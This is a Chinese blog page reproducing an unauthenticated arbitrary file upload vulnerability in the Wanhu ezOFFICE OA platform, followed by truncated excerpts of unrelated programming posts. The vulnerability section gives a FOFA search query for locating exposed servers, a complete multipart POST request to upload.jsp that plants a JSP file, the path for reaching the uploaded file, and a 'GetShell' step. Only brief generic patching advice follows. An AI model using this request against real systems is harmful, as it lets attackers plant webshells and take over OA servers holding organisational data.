当前位置：首页 > news >正文

万户OA upload任意文件上传漏洞复现

news 2026/2/9 19:03:05

0x01 产品简介

万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品，统一的基础管理平台，实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台，将外网信息维护、客户服务、互动交流和日常工作紧密结合起来，有效提高工作效率。

0x02 漏洞概述

万户ezOFFICE协同管理平台upload接口处存在任意文件上传漏洞，未经身份认证的攻击者可以通过此漏洞上传恶意后门文件，造成代码执行或服务器失陷。

0x03 复现环境

FOFA：app="万户ezOFFICE协同管理平台"

0x04 漏洞复现

PoC

POST /defaultroot/platform/portal/layout/common/upload.jsp?portletSettingId=123&path=abc HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: application/octet-stream<%out.print("test");%>
--b0d829daa06c13d6b3e16b0ad21d1eed--

验证url

http://your-ip/defaultroot/upload/abc(path参数的值)/202311(现年月)/(返回的文件名).jsp

GetShell

尝试连接

0x05 修复建议

关闭互联网暴露面或接口处设置访问权限

打补丁或升级安全版本

万户OA upload任意文件上传漏洞复现

0x01 产品简介万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品，统一的基础管理平台，实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台，将外网信息…...

编程日记 2023/11/20 22:05:20

如何写好一篇软文？怎样写软文比较有吸引力？

软文，即柔性广告，是一种通过文字、图片等形式，将广告信息融入到内容中，以达到宣传、推广、营销目的的文章。企业和品牌每天都会在互联网上投放大量软文，软文起到润物细无声的作用，可以在无形中影响用户心智…...

编程日记 2023/11/20 22:04:19

从0开始学习JavaScript--JavaScript中的对象

JavaScript中的对象是一种重要的数据结构，它不仅是语言的基石，还提供了丰富的功能和灵活性。本文将深入研究JavaScript对象的创建、属性访问、方法定义，以及实际应用中的技巧，通过丰富的示例代码，帮助读者更全面地了解…...

编程日记 2023/11/20 22:02:17

【LeetCode刷题】--7.整数反转

7.整数反转注意：在推入数字之前，需要判断MIN_VALUE< res*10digit<MAX_VALUE，不满足就返回0 class Solution {public int reverse(int x) {int res 0;while(x!0){//需要判断MIN_VALUE< res*10digit<MAX_VALUEif(res < Integ…...

编程日记 2023/11/20 22:01:16

Genio 500_MT8385安卓核心板：功能强大且高效

Genio 500(MT8385)安卓核心板是一款功能强大且高效的AIoT平台，内置的AI处理器(APU)工作频率可达500MHz，支持深度学习、神经网络加速和计算机视觉应用。配合高达2500万像素的摄像头，可以为AI相机应用提供清晰、精确的图像，如人脸识…...

编程日记 2023/11/20 22:00:15

idea导入javaweb变成灰色

解决办法： 如果这时候src是蓝色，其余都是灰色文件夹，这时候要先把src文件夹变成灰色，否则之后会报错 src文件变成灰色方法，右键src,选择make direcory as 选择unmark 如果src不是蓝色，就是灰色&#xff0…...

编程日记 2023/11/20 21:59:14

SpringBoot集成Memcached

SpringBoot集成Memcached 1、Memcached 介绍 Memcached 是一个高性能的分布式内存对象缓存系统，用于动态Web应用以减轻数据库负载。它通过在内存中缓存数据和对象来减少读取数据库的次数，从而提高动态、数据库驱动网站的速度。Memcached基于一个存储…...

编程日记 2023/11/20 21:57:12

git基本操作(配图超详细讲解)

个人主页：Lei宝啊愿所有美好如期而遇目录创建git本地仓库配置仓库认识工作区，暂存区，版本库修改文件版本回退撤销修改删除文件创建git本地仓库要提前说的是，仓库是进⾏版本控制的⼀个⽂件⽬录。我们要想对⽂…...

编程日记 2023/11/20 21:56:11

【网络通信】浅析UDP与TCP协议的奥秘

在现代互联网中，UDP（用户数据报协议）和TCP（传输控制协议）是两种最常用的传输协议，它们被广泛应用于网络数据传输。尽管这两种协议都可以用来在网络上传输数据，但它们在设计目标、特点和适用场景…...

编程日记 2023/11/20 21:55:10

C#核心笔记——（二）C#语言基础

一、C#程序 1.1 基础程序 using System; //引入命名空间namespace CsharpTest //将以下类定义在CsharpTest命名空间中 {internal class TestProgram //定义TestProgram类{public void Test() { }//定义Test方法} }方法是C#中的诸多种类的函数之一。另一种函数*，还…...

编程日记 2023/11/20 21:54:08

C 删除无头链上所有指定值为x的节点。 #include<stdio.h> #include<ctype.h> #include<stdlib.h> typedef struct app {int data;struct app* next; }APP; int main() {int n;int node;int x;while (scanf("%d", &n) ! EOF){APP* head NULL, …...

编程日记 2023/11/20 21:53:07

linux基本指令以及热键

基本指令 ♥clear ♥whoami ♥who ♥pwd ♥ls指令（重点） ls -a： ls -l ♥mkdir ♥cd指令 ♥touch指令 ♥stat指令 ♥rmdir指令 && rm 指令 ♥man指令 ♥nano指令 ♥cp指令 ♥mv指令 ♥cat指令 🗡输出/输出重定向 &#x1…...

编程日记 2023/11/20 21:51:04

Rocketmq消费消息时不丢失不重复

消息消费不丢失手动ACK 在消费者端，需要确保在消息拉取并消费成功之后再给Broker返回ACK，就可以保证消息不丢失了，如果这个过程中Broker一直没收到ACK，那么就可以重试。所以，在消费者的代码中，一定要在业…...

编程日记 2023/11/20 21:50:03

RedisInsight——redis的桌面UI工具使用实践

下载官网下载安装。下载地址在这里填个邮箱地址就可以下载了。安装使用。安装成功后开始使用。 1. 你可以add一个地址。或者登录redis cloud 去auto-discover 2 . 新增你的redis库地址。注意index的取值 3。现在可以登录到redis了。看看结果这是现在在服务器上执行…...

编程日记 2023/11/20 21:49:01

JVM对象创建与内存分配

对象的创建对象创建的主要流程： 类加载推荐博客：JVM类加载机制详解类加载检查虚拟机遇到一条new指令时，首先将去检查这个指令的参数是否能在常量池中定位到一个类的符号引用，并且检查这个符号引用代表的类是否已被加载、解析…...

编程日记 2023/11/20 21:48:00

央国企数字化转型难在哪？为什么要数字化转型？

科技在发展，技术在升级，全球信息化、数字化的步伐在加快，企业想要在未来的发展中抓住机会，更好地发展壮大，就需要加快企业数字化转型的速度，才能立足于信息化、数字化时代，央国企作为企业中的一…...

编程日记 2023/11/20 21:46:59

第7天：信息打点-资产泄漏amp；CMS识别amp；Git监控amp；SVNamp；DS_Storeamp；备份

第7天：信息打点-资产泄漏&CMS识别&Git监控&SVN&DS_Store&备份知识点： 一、cms指纹识别获取方式网上开源的程序，得到名字就可以搜索直接获取到源码。 cms在线识别： CMS识别：https://www.yun…...

编程日记 2023/11/20 21:45:58

不可思议，红警居然开源了！

红警，准确的说应该叫“红色警戒”，是大部分 80/90 后记忆里跟游戏二字关系最深的情节。相信每一名 80/90 后，都有一段难忘的红警岁月，甚至可以说很多人的青春，就叫红警! 说到红色警戒游戏，估计应该是很多…...

编程日记 2023/11/20 21:44:57

yolo系列模型训练数据集全流程制作方法（附数据增强代码）

yolo系列的模型在目标检测领域里面受众非常广，也十分流行，但是在使用yolo进行目标检测训练的时候，往往要将VOC格式的数据集转化为yolo专属的数据集，而yolo的训练数据集制作方法呢，最常见的也是有两种，下面我…...

编程日记 2023/11/20 21:43:56

4、FFmpeg命令行操作7

转封装(1) 保持编码格式： ffmpeg -i test.mp4 -vcodec copy -acodec copy test_copy.ts ffmpeg -i test.mp4 -codec copy test_copy2.ts 改变编码格式： ffmpeg -i test.mp4 -vcodec libx265 -acodec libmp3lame out_h265_mp3.mkv …...

编程日记 2023/11/20 21:41:55

微软PowerBI考试 PL300-选择 Power BI 模型框架【附练习数据】

微软PowerBI考试 PL300-选择 Power BI 模型框架 20 多年来，Microsoft 持续对企业商业智能 (BI) 进行大量投资。 Azure Analysis Services (AAS) 和 SQL Server Analysis Services (SSAS) 基于无数企业使用的成熟的 BI 数据建模技术。同样的技术也是 Power BI 数据…...

编程新知 2026/2/1 19:08:45

以下是对华为 HarmonyOS NETX 5属性动画（ArkTS）文档的结构化整理，通过层级标题、表格和代码块提升可读性：

一、属性动画概述NETX 作用：实现组件通用属性的渐变过渡效果，提升用户体验。支持属性：width、height、backgroundColor、opacity、scale、rotate、translate等。注意事项： 布局类属性（如宽高）变化时&#…...

编程新知 2026/1/28 21:15:38

【Linux】C语言执行shell指令

在C语言中执行Shell指令在C语言中，有几种方法可以执行Shell指令： 1. 使用system()函数这是最简单的方法，包含在stdlib.h头文件中： #include <stdlib.h>int main() {system("ls -l"); // 执行ls -l命令retu…...

编程新知 2025/11/20 18:42:48

使用分级同态加密防御梯度泄漏

抽象联邦学习 （FL） 支持跨分布式客户端进行协作模型训练，而无需共享原始数据，这使其成为在互联和自动驾驶汽车 （CAV） 等领域保护隐私的机器学习的一种很有前途的方法。然而，最近的研究表明&…...

编程新知 2026/1/24 6:22:43

华为OD机试-食堂供餐-二分法

import java.util.Arrays; import java.util.Scanner;public class DemoTest3 {public static void main(String[] args) {Scanner in new Scanner(System.in);// 注意 hasNext 和 hasNextLine 的区别while (in.hasNextLine()) { // 注意 while 处理多个 caseint a in.nextIn…...

编程新知 2026/1/28 11:11:03